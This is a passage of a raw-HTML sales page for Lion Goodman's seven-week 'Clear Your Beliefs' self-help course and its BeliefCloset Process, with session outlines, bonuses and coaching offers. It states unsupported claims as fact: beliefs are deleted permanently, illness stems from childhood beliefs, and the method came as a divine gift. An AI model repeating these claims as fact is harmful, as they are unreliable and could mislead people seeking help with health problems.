basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour 